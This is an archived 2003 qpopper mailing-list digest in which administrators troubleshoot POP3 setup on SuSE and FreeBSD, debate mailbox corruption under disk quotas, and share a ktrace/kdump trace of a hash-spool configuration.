From: "redlineracerx" <redlineracerx at hotmail dot com>
Subject: starting qpopper
Date: Thu, 6 Mar 2003 09:47:22 -0800
This is a multi-part message in MIME format.
------=_NextPart_000_0002_01C2E3C5.629DDAD0
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: 7bit
How do I start qpopper on suse 8.1? Default install.
Thanks,
paul
------=_NextPart_000_0002_01C2E3C5.629DDAD0
Content-Type: text/html;
charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
<html xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns="http://www.w3.org/TR/REC-html40">
<head>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;
charset=us-ascii">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 10">
<meta name=Originator content="Microsoft Word 10">
<link rel=File-List href="cid:filelist.xml@01C2E3C5 dot 625A9040">
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:DoNotRelyOnCSS/>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:SpellingState>Clean</w:SpellingState>
<w:GrammarState>Clean</w:GrammarState>
<w:DocumentKind>DocumentEmail</w:DocumentKind>
<w:EnvelopeVis/>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
</w:Compatibility>
<w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
</w:WordDocument>
</xml><![endif]-->
<style>
<!--
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Arial;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:"Times New Roman";
color:navy;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
p.MsoAutoSig, li.MsoAutoSig, div.MsoAutoSig
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman";
mso-fareast-font-family:"Times New Roman";}
span.EmailStyle17
{mso-style-type:personal-compose;
mso-style-noshow:yes;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:windowtext;}
span.SpellE
{mso-style-name:"";
mso-spl-e:yes;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.25in 1.0in 1.25in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]-->
</head>
<body lang=EN-US link=blue vlink=purple
style='tab-interval:.5in'>
<div class=Section1>
<p class=MsoNormal><font size=2 color=black face=Arial><span
style='font-size:
10.0pt;mso-bidi-font-family:Arial;color:windowtext'>How do I start <span
class=SpellE>qpopper</span> on <span class=SpellE>suse</span> 8.1?
Default
install…<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Arial><span
style='font-size:
10.0pt;mso-bidi-font-family:Arial;color:windowtext'><o:p> </o:p></sp
an></font></p>
<p class=MsoAutoSig><font size=2 face=Arial><span
style='font-size:10.0pt;
font-family:Arial;mso-no-proof:yes'>Thanks,<o:p></o:p></span></font></p>
<p class=MsoAutoSig><font size=2 face=Arial><span
style='font-size:10.0pt;
font-family:Arial;mso-no-proof:yes'>paul</span></font><o:p></o:p></p>
<p class=MsoNormal><font size=2 color=navy face=Arial><span
style='font-size:
10.0pt'><o:p> </o:p></span></font></p>
</div>
</body>
</html>
------=_NextPart_000_0002_01C2E3C5.629DDAD0--
Date: Thu, 6 Mar 2003 10:40:26 -0800 (PST)
From: Chris Miller <ctodd at netgate dot net>
Subject: Re: Mailbox corrupt by disk quota
Chuck,
I want to start off by thanking you for attempting to assist me,
but I'm afraid I'm going to have to disagree with you on a few points
here. Quota systems may not have been intended for mail just like mail
systems were never intended for spammers, but things evolve over time and
requirements change. I don't know of any ISPs that don't use a quota
system to enforce email limits, it's now a necessity.
There are other popper programs that have quota systems built in just for
this reason. In qpopper 3.x if the write to /var/mail failed, the mail
simply got left in the temp directory. Still a problem but it didn't lead
to corrupted mailboxes which require a sysadmin to fix instead of a first
tier support rep. It seems to me that qpopper should be able to play
nicely in the types of environments it will run in.
Obviously there is no way for qpopper to know what the quota is if any
until it hits that quota. This could easily be accomplished by copying the
.user.pop file back to the spool directory under a different filename,
then once successful it could rename the file.
The solution that occured to me is that qpopper could keep the user's
mailspool locked during the entire process so that no new mail could be
delivered while the user is downloading mail. Although I haven't read the
rfc from front to back, I did get some indication that this was considered
legal.
The bottom line is that I need a pop server that plays nicely with quotas,
corrupted mailboxes cause too many support issues. Customers get upset
even though they created their own problem by turning on options they
don't understand (leave mail on server). It would be nice to see a built
in quota feature, or a locking option in a future release of qpopper that
would solve this problem.
Writing scripts to police mailboxes might be a nice warning feature for
our customers (something I considered) but it's not a solution for corrupt
mailboxes. If qpopper can't write the file out to a filesystem, it should
leave the file behind in the temp drop. Corrupting files is not what I
would consider "failing gracefully".
Thanks again for your help.
Regards,
Chris
On Thu, 6 Mar 2003, Chuck Yerkes wrote:
> System quotae were intended to keep users from storing too
> much on the machines in their HOME DIRECTORIES.
>
> That was the intent of quota systems.
>
> So we can use it as a hack to limit mailboxes size. But recall
> that it's a hack, so we have to work around some of the quota intent
> of offering a hard ceiling. Users don't duplicate their home
> directories a lot.
>
> The Right Answer is not to (mis)use the system quotae, but rather,
> put the checking in the delivery agent and let it use the soft
> quota as an advisory - you could get the info from LDAP if you
> wanted. But it's work on your part, at this moment.
>
> Quoting Alan Brown (alanb at digistar dot com):
> > On Thu, 6 Mar 2003, Chuck Yerkes wrote:
> >
> > > However, using the disk system to enforce mail quota's is inherently
> > > a hack, given that there will be, for a moment, two spools.
> >
> > The only way around system quotas is to have the files in 2 different
> > partitions, but that is a _huge_ performance hit.
> >
> > Server mode makes user.pop handling a lot safer, but you need to ensure
> > that there is no direct access to the spool (eg, pine or mail) (Pine can
> > be configured to use pop in /etc/pine.conf or /etc/pine.conf.fixed), or
> > the direct access program.
> >
> > As Chuck says, pop is not designed for a lot of this high-end stuff.
> >
> > AB
> >
>
Date: Thu, 06 Mar 2003 13:46:10 -0500
From: Michael Kolos <michael at colba dot net>
Subject: Re: Mailbox corrupt by disk quota
At 12:22 PM 3/6/2003, you wrote:
>On Thu, 6 Mar 2003, Chuck Yerkes wrote:
>
> > However, using the disk system to enforce mail quota's is inherently
> > a hack, given that there will be, for a moment, two spools.
>
>The only way around system quotas is to have the files in 2 different
>partitions, but that is a _huge_ performance hit.
>
As bad as the hit is, it's not nearly as bad (or unmanageable) as user
calling every day because they can't get their mail.
With the relatively low-cost of disk space, it may be best to simply give
users an unlimited quota, and run scripts to erase any boxes not checked in
an arbitrarily long amount of time.
Of course this also opens up DoS possibilities of someone's box getting
flooded with mail.
We run on two different file systems to avoid so many quota issues, and it
is not that bad of a performance hit.
It seems that there really is no absolute solution with the current
software. Either a DoS opportunity is opened up or users are stuck, or
mail is corrupted.
We run with the temp dir on a non-quota filesystem, and hard quota only
100k larger than soft quota on the spool partition and with about 10,000
users, there are no load problems from qpopper and mailbox corruption as
described in this thread only occurs about once every few months for anyone.
Michael Kolos
Colba.Net Inc.
From: "redlineracerx" <redlineracerx at hotmail dot com>
Subject: RE: starting qpopper
Date: Thu, 6 Mar 2003 12:31:53 -0800
This is a multi-part message in MIME format.
------=_NextPart_000_0001_01C2E3DC.5E732570
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
Thanks for your reply... I did a telnet localhost 110
This is what I receive...
telnet: connect to address ::1: Connection refused
telnet: connect to address 127.0.0.1: Connection refused
Trying ::1...
Trying 127.0.0.1...
How do I open up port 110? Sorry I am a linux newbie...
-paul
-----Original Message-----
From: Chuck Yerkes [mailto:chuck at snew dot com]
Sent: Thursday, March 06, 2003 10:35 AM
To: redlineracerx
Subject: Re: starting qpopper
reading the lovely pdf that came with it might suggest
that inetd is involved (or xinetd in suse?)
Quoting redlineracerx (redlineracerx at hotmail dot com):
> How do I start qpopper on suse 8.1? Default install.
>
> Thanks,
> paul
>
------=_NextPart_000_0001_01C2E3DC.5E732570
Content-Type: text/html;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
<html xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:st1="urn:schemas-microsoft-com:office:smarttags"
xmlns="http://www.w3.org/TR/REC-html40">
<head>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;
charset=us-ascii">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 10">
<meta name=Originator content="Microsoft Word 10">
<link rel=File-List href="cid:filelist.xml@01C2E3DC dot 5E221F40">
<o:SmartTagType
namespaceuri="urn:schemas-microsoft-com:office:smarttags"
name="PersonName"/>
<o:SmartTagType
namespaceuri="urn:schemas-microsoft-com:office:smarttags"
name="time"/>
<o:SmartTagType
namespaceuri="urn:schemas-microsoft-com:office:smarttags"
name="date"/>
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:DoNotRelyOnCSS/>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:SpellingState>Clean</w:SpellingState>
<w:GrammarState>Clean</w:GrammarState>
<w:DocumentKind>DocumentEmail</w:DocumentKind>
<w:EnvelopeVis/>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
</w:Compatibility>
<w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
</w:WordDocument>
</xml><![endif]--><!--[if !mso]>
<style>
st1\:*{behavior:url(#default#ieooui) }
</style>
<![endif]-->
<style>
<!--
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Arial;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:"Times New Roman";
color:navy;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Courier New";
mso-fareast-font-family:"Times New Roman";
color:navy;}
p.MsoAutoSig, li.MsoAutoSig, div.MsoAutoSig
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman";
mso-fareast-font-family:"Times New Roman";}
span.EmailStyle17
{mso-style-type:personal-compose;
mso-style-noshow:yes;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:windowtext;}
span.SpellE
{mso-style-name:"";
mso-spl-e:yes;}
span.GramE
{mso-style-name:"";
mso-gram-e:yes;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 77.95pt 1.0in 77.95pt;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]-->
</head>
<body lang=EN-US link=blue vlink=purple
style='tab-interval:.5in'>
<div class=Section1>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'>Thanks for your reply... I did a telnet <span
class=SpellE>localhost</span> 110 <o:p></o:p></span></font></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'>This is what I
receive...<o:p></o:p></span></font></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'><o:p> </o:p></span></font></p>
<p class=MsoPlainText><span class=GramE><font size=2 color=navy
face="Courier New"><span
style='font-size:10.0pt'>telnet</span></font></span>:
connect to address ::1: Connection refused<o:p></o:p></p>
<p class=MsoPlainText><span class=GramE><font size=2 color=navy
face="Courier New"><span
style='font-size:10.0pt'>telnet</span></font></span>:
connect to address 127.0.0.1: Connection refused<o:p></o:p></p>
<p class=MsoPlainText><span class=GramE><font size=2 color=navy
face="Courier New"><span style='font-size:10.0pt'>Trying
::</span></font></span>1...<o:p></o:p></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'>Trying
127.0.0.1...<o:p></o:p></span></font></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'><o:p> </o:p></span></font></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'>How do I open up port 110? Sorry I am a <span
class=SpellE>linux</span> newbie...<o:p></o:p></span></font></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'><o:p> </o:p></span></font></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'>-<span
class=GramE>paul</span><o:p></o:p></span></font></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'>-----Original Message-----<br>
From: Chuck <span class=SpellE>Yerkes</span>
[mailto:chuck at snew dot com<span
class=GramE>] <br>
Sent</span>: </span></font><st1:date Month="3" Day="6"
Year="2003">Thursday,
March 06, 2003</st1:date> <st1:time Hour="10" Minute="35">10:35
AM</st1:time><br>
To: <span class=SpellE>redlineracerx</span><br>
Subject: Re: starting <span class=SpellE>qpopper</span><o:p></o:p></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'><o:p> </o:p></span></font></p>
<p class=MsoPlainText><span class=GramE><font size=2 color=navy
face="Courier New"><span
style='font-size:10.0pt'>reading</span></font></span>
the lovely <span class=SpellE>pdf</span> that came with it might
suggest<o:p></o:p></p>
<p class=MsoPlainText><span class=GramE><font size=2 color=navy
face="Courier New"><span
style='font-size:10.0pt'>that</span></font></span> <span
class=SpellE>inetd</span> is involved (or <span
class=SpellE>xinetd</span> in <span
class=SpellE>suse</span>?)<o:p></o:p></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'><o:p> </o:p></span></font></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'>Quoting <span
class=SpellE>redlineracerx</span>
(</span></font><st1:PersonName>redlineracerx at hotmail dot com</st1:PersonName>
):<o:p></o:p></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'>> How do I start <span
class=SpellE>qpopper</span>
on <span class=SpellE>suse</span> 8.1? <span class=GramE>Default
install</span>.<o:p></o:p></span></font></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'>><span style='mso-spacerun:yes'>
</span><o:p></o:p></span></font></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'>> Thanks,<o:p></o:p></span></font></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'>> <span
class=GramE>paul</span><o:p></o:p></span></font></p>
<p class=MsoPlainText><font size=2 color=navy face="Courier
New"><span
style='font-size:10.0pt'>><span style='mso-spacerun:yes'>
</span><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=navy face=Arial><span
style='font-size:
10.0pt'><o:p> </o:p></span></font></p>
</div>
</body>
</html>
------=_NextPart_000_0001_01C2E3DC.5E732570--
Date: Thu, 06 Mar 2003 18:06:58 -0500
From: Shane Bywater <shane at apexia dot ca>
Subject: H_e_l_p needed: qpopper doesn't see mail
Problem: qpopper doesn't see local mail for users
Qpopper version: 4.0.4
OS: FreeBSD 4.7
Details:
I installed Qpopper using:
./configure --enable-hash-spool=2 --enable-server-mode
make
make install
Added to inetd.conf:
pop3 stream tcp nowait root /usr/local/sbin/popper qpopper -s
Made sure /etc/services had:
pop3 110/tcp
Restarted inetd
Sent email to local user "shane"
Mail made it to local user as shown below:
-rw------- 1 shane shane 980 Mar 6 17:10 shane
But when I telnet into pop3:
server# telnet localhost pop3
Connected to localhost.
Escape character is '^]'.
+OK Qpopper (version 4.0.4) at localhost starting.
user shane
+OK Password required for shane.
pass ******
+OK shane has 0 visible messages (0 hidden) in 0 octets.
quit
+OK Pop server at localhost signing off.
Connection closed by foreign host.
Question:
Why doesn't qpopper see my email? My email client (Eudora 5.2) doesn't
see it either. There are no error messages returned when I try to download
the email through Eudora.
/var/log/messages shows:
Mar 6 17:25:25 mail2 qpopper[149]: Stats: shane 0 0 0 0
extreme158.cois.on.ca 205.211.155.158
Can someone please tell me what I need to do to fix this problem?
Thanks,
Shane
Subject: Re: H_e_l_p needed: qpopper doesn't see mail
Date: Thu, 06 Mar 2003 16:01:51 -0800
From: Greg Earle <earle at isolar.DynDNS dot ORG>
> Problem: qpopper doesn't see local mail for users
> Qpopper version: 4.0.4
> OS: FreeBSD 4.7
> Details:
> I installed Qpopper using:
> ./configure --enable-hash-spool=2 --enable-server-mode
> make
> make install
>
> Added to inetd.conf:
> pop3 stream tcp nowait root /usr/local/sbin/popper qpopper -s
>
> Made sure /etc/services had:
> pop3 110/tcp
>
> Restarted inetd
>
> Sent email to local user "shane"
>
> Mail made it to local user as shown below:
> -rw------- 1 shane shane 980 Mar 6 17:10 shane
>
> But when I telnet into pop3:
> server# telnet localhost pop3
> Connected to localhost.
> Escape character is '^]'.
> +OK Qpopper (version 4.0.4) at localhost starting.
> user shane
> +OK Password required for shane.
> pass ******
> +OK shane has 0 visible messages (0 hidden) in 0 octets.
> quit
> +OK Pop server at localhost signing off.
> Connection closed by foreign host.
>
> Question:
> Why doesn't qpopper see my email?
Try using "ktrace" on the spawned qpopper daemon once you've made the
initial connection via telnet and gotten the "+OK Qpopper (version 4.0.4)"
banner.
e.g. "cd /tmp ; sudo ktrace -d -i -p <pid-of-running-qpopper>"
Once you've "quit" and the "qpopper" process has exited, run
"cd /tmp ; sudo kdump | less" (or "more")
and look at the output to see where "qpopper" went looking for your
"visible messages" once you authenticated to it.
"ktrace"/"kdump" are Your Friends.
- Greg
Date: Thu, 6 Mar 2003 19:39:20 -0500 (EST)
From: Homer Wilson Smith <homer at lightlink dot com>
Subject: Re: Indispensable admins (was Re: QPOPPER SENDMAIL/PROCMAIL: AND
Hi Tony,
I am unable to get the patch to cleanly patch against qpopper 4.0.4.
If put into the qpopper directory itself it fails.
If put into one directory out of the qpopper directory it seems
to work but places the patched files in that outer directory rather
than where they belong.
Perhaps I am just a confused newbie, but I would really
love to try this out...
Thanks Homer
------------------------------------------------------------------------
Homer Wilson Smith The Paths of Lovers Art Matrix - Lightlink
(607) 277-0959 KC2ITF Cross Internet Access, Ithaca NY
homer at lightlink.com In the Line of Duty http://www.lightlink dot com
On Thu, 27 Feb 2003, The Little Prince wrote:
> On Thu, 27 Feb 2003, Chuck Yerkes wrote:
>
> > >
> > > my boss always used to tell me..man, if you ever got hit by a bus, we'd be
> > > dead. kinda makes you feel like one of those metal briefcases people
> > > handcuff to their wrists.
> >
> > Yeah, I had guys who'd wack something together (and used to be one
> > of those). But the "hit by a bus" can also be pronounced "take a vacation".
>
> heh, yeah, take a vacation is a totally interchangeable phrase
> i didn't mean to give to give the impression i LIKED being that
> highly-dependable person.
> personally, i hate being the lynch pin. pager every weekend, 2am
> pages, blah blah. we all wear our many hats.
> but, you know, it was a start-up. profits were slim, budget tight.
> i work a lot better when there's a few admins around..don't feel so
> needed.
>
> --Tony
> .-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
> Anthony J. Biacco Network Administrator/Engineer
> thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
>
> "This will prove a brave kingdom to me,
> where I shall have my music for nothing"
> .-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
>
Date: Thu, 06 Mar 2003 21:14:12 -0500
From: Stephen Larsen <stephen.larsen2 at verizon dot net>
Subject: Beginner Question
--=====================_120669142==.ALT
Content-Type: text/plain; charset="us-ascii"; format=flowed
Hello All,
My name is Stephen Larsen and I have what I think is
a successful QPopper 4 setup on my Linux system. I
followed the instructions in the .pdf file that was at the
Qualcom website as best I could and now when I telnet
to my server rascal.xxx.xxx I get a interesting message:
[pest@rascal pest]$ telnet rascal.xxx dot xxx 110
Trying 127.0.0.1...
Connected to rascal.xxx.xxx.
Escape character is '^]'.
+OK Qpopper (version 4.0.4) at rascal.xxx.xxx starting.
which to me says that the server is running? Anyway ..
I was wondering if there was a resource like a website that
has a listing of howtos like how to add a mail account or
maybe a list that caters to newbies. The reason why I
am asking is that it seems that this list is made up of
mostly experienced users or professionals and the last
thing I'd want to do is take up mailbox space and people's
time asking such rudimentary questions like basic setup
and operation. Can anyone make a recommendation? I
sure would appreciate it. Thank you in advance ..
Stephen Larsen
--=====================_120669142==.ALT
Content-Type: text/html; charset="us-ascii"
<html>
<body>
Hello All,<br><br>
My name is Stephen Larsen and I have what I think is<br>
a successful QPopper 4 setup on my Linux system. I<br>
followed the instructions in the .pdf file that was at the<br>
Qualcom website as best I could and now when I telnet<br>
to my server rascal.xxx.xxx I get a interesting message:<br><br>
<font color="#0000FF">[pest@rascal pest]$ telnet rascal.xxx dot xxx 110<br>
Trying 127.0.0.1...<br>
Connected to rascal.xxx.xxx.<br>
Escape character is '^]'.<br>
+OK Qpopper (version 4.0.4) at rascal.xxx.xxx
starting.<br><br>
</font>which to me says that the server is running? Anyway ..<br>
I was wondering if there was a resource like a website that<br>
has a listing of howtos like how to add a mail account or<br>
maybe a list that caters to newbies. The reason why I<br>
am asking is that it seems that this list is made up of<br>
mostly experienced users or professionals and the last<br>
thing I'd want to do is take up mailbox space and people's<br>
time asking such rudimentary questions like basic setup<br>
and operation. Can anyone make a recommendation? I<br>
sure would appreciate it. Thank you in advance ..<br><br>
Stephen Larsen</body>
</html>
--=====================_120669142==.ALT--
Date: Thu, 6 Mar 2003 21:52:37 -0500
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: Mailbox corrupt by disk quota
Or implement a quota system for mail using the only two bits
that TOUCH mail, your LDA (procmail/mail.local) and QPopper.
File system quotae were developed for home directories.
Quoting Michael Kolos (michael at colba dot net):
> At 12:22 PM 3/6/2003, you wrote:
> >On Thu, 6 Mar 2003, Chuck Yerkes wrote:
> >
> >> However, using the disk system to enforce mail quota's is inherently
> >> a hack, given that there will be, for a moment, two spools.
> >
> >The only way around system quotas is to have the files in 2 different
> >partitions, but that is a _huge_ performance hit.
> >
>
> As bad as the hit is, it's not nearly as bad (or unmanageable) as user
> calling every day because they can't get their mail.
> With the relatively low-cost of disk space, it may be best to simply give
> users an unlimited quota, and run scripts to erase any boxes not checked in
> an arbitrarily long amount of time.
> Of course this also opens up DoS possibilities of someone's box getting
> flooded with mail.
>
> We run on two different file systems to avoid so many quota issues, and it
> is not that bad of a performance hit.
>
> It seems that there really is no absolute solution with the current
> software. Either a DoS opportunity is opened up or users are stuck, or
> mail is corrupted.
>
> We run with the temp dir on a non-quota filesystem, and hard quota only
> 100k larger than soft quota on the spool partition and with about 10,000
> users, there are no load problems from qpopper and mailbox corruption as
> described in this thread only occurs about once every few months for anyone.
From: Gustavo Moyano <gustavo at infodoors.com dot ar>
Subject: Problems with --enable-home-dir-misc
Date: Fri, 7 Mar 2003 11:17:42 -0300
Hello, I am new with ppopper.
I installed qpopper4.0.4 and the option --enable-home-dir-misc don't work
=2E
Is there any change with that option?
Tanks
Gustavo Moyano
Date: Fri, 07 Mar 2003 09:55:23 -0500
From: Shane Bywater <shane at apexia dot ca>
Subject: Re: H_e_l_p needed: qpopper doesn't see mail
At 04:01 PM 3/6/2003 -0800, you wrote:
>Try using "ktrace" on the spawned qpopper daemon once you've made the
>initial connection via telnet and gotten the "+OK Qpopper (version 4.0.4)"
>banner.
>
>e.g. "cd /tmp ; sudo ktrace -d -i -p <pid-of-running-qpopper>"
>
>Once you've "quit" and the "qpopper" process has exited, run
>
>"cd /tmp ; sudo kdump | less" (or "more")
>
>and look at the output to see where "qpopper" went looking for your
>"visible messages" once you authenticated to it.
>
>"ktrace"/"kdump" are Your Friends.
>
> - Greg
Hi,
I've tried Greg's suggestion and I need help deciphering the output:
# kdump | more
1219 popper RET read 6
1219 popper CALL setitimer(0,0xbfbfe5b0,0xbfbfe5a0)
1219 popper RET setitimer 0
1219 popper CALL sigaction(0xe,0xbfbfe598,0xbfbfe580)
1219 popper RET sigaction 0
1219 popper CALL getpid
1219 popper RET getpid 1219/0x4c3
1219 popper CALL __sysctl(0xbfbfe5c0,0x4,0,0,0x2811f700,0x2b)
1219 popper RET __sysctl 0
1219 popper CALL gettimeofday(0xbfbfd508,0)
1219 popper RET gettimeofday 0
1219 popper CALL gettimeofday(0xbfbfc5a8,0)
1219 popper RET gettimeofday 0
1219 popper CALL access(0x28118324,0x4)
1219 popper NAMI "/etc/localtime"
1219 popper RET access 0
1219 popper CALL open(0x28118324,0,0)
1219 popper NAMI "/etc/localtime"
1219 popper RET open 4
1219 popper CALL fstat(0x4,0xbfbfc480)
1219 popper RET fstat 0
1219 popper CALL read(0x4,0xbfbfa174,0x1f08)
1219 popper GIO fd 4 read 1218 bytes
"TZif\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\^B\0\0\0\^B\0\0\0\0\0\0\0\M-f\0\0\0\^B\0\0\0\b\M^\\M-=\^A\M-p\
\M-8\M^Sp\M^_\M-@1`\240\M^GX\M-x\M-!\M^Y\M^B\M-h\M-"\M^T\r\M-x\M-#_\^F\M-h\M-$s\M-h\M-p\M-%>\M-h\M-h\M-&S\M-J\M-p\M-'\^^\
\M-J\M-h\M-*-\M-l\M-p\M-*\M-^\M^N\M-h\M-+\M-|\M-+p\M-,\M->p\M-h\M--\M-
<A LOT MORE OF THE ABOVE "non english" WAS DELETED FOR POSTING TO MAILIST>
1219 popper RET read 1218/0x4c2
1219 popper CALL close(0x4)
1219 popper RET close 0
1219 popper CALL getpid
1219 popper RET getpid 1219/0x4c3
1219 popper CALL socket(0x1,0x2,0)
1219 popper RET socket 4
1219 popper CALL fcntl(0x4,0x2,0x1)
1219 popper RET fcntl 0
1219 popper CALL connect(0x4,0xbfbfc554,0x6a)
1219 popper NAMI "/var/run/log"
1219 popper RET connect 0
1219 popper CALL sendto(0x4,0xbfbfca50,0x4c,0,0,0)
1219 popper GIO fd 4 wrote 76 bytes
"<133>Mar 7 09:25:26 qpopper[1219]: Stats: shane 0 0 0 0 localhost
127.0.0.1"
1219 popper RET sendto 76/0x4c
1219 popper CALL unlink(0xbfbfd410)
1219 popper NAMI "/var/mail/s/h/.shane.cache"
1219 popper RET unlink -1 errno 2 No such file or directory
1219 popper CALL ftruncate(0x3,0,0,0)
1219 popper RET ftruncate 0
1219 popper CALL unlink(0xbfbfec38)
1219 popper NAMI "/var/mail/s/h/.shane.pop"
1219 popper RET unlink 0
1219 popper CALL close(0x3)
1219 popper RET close 0
1219 popper CALL write(0,0x806f000,0x2a)
1219 popper GIO fd 0 wrote 42 bytes
"+OK Pop server at localhost signing off.\r
"
1219 popper RET write 42/0x2a
1219 popper CALL close(0x4)
1219 popper RET close 0
1219 popper CALL exit(0)
I'm not sure what this is telling me. What directory is qpopper looking
for my email? I see /var/mail/s/h/.shane.cache which I don't think should
contain email and /var/mail/s/h/.shane.pop which is the temp file which is
created when one checks email. I don't see anywhere in this dump that
qpopper is looking for my mail in /var/mail/shane. With shane being a file
with the following permissions:
-rw------- 1 shane shane 980 Mar 6 17:10 shane
Any suggestions would be appreciated,
Shane
Date: Fri, 07 Mar 2003 10:39:55 -0600
From: Butch Kemper <kemper at tstar dot net>
Subject: Re: H_e_l_p needed: qpopper doesn't see mail
Read on page 14 in the Qpopper Guide documentation as it appears that you
have set the hash-spool option.
Butch
At 08:55 AM 3/7/03, you wrote:
>At 04:01 PM 3/6/2003 -0800, you wrote:
>
>>Try using "ktrace" on the spawned qpopper daemon once you've made the
>>initial connection via telnet and gotten the "+OK Qpopper (version 4.0.4)"
>>banner.
>>
>>e.g. "cd /tmp ; sudo ktrace -d -i -p <pid-of-running-qpopper>"
>>
>>Once you've "quit" and the "qpopper" process has exited, run
>>
>>"cd /tmp ; sudo kdump | less" (or "more")
>>
>>and look at the output to see where "qpopper" went looking for your
>>"visible messages" once you authenticated to it.
>>
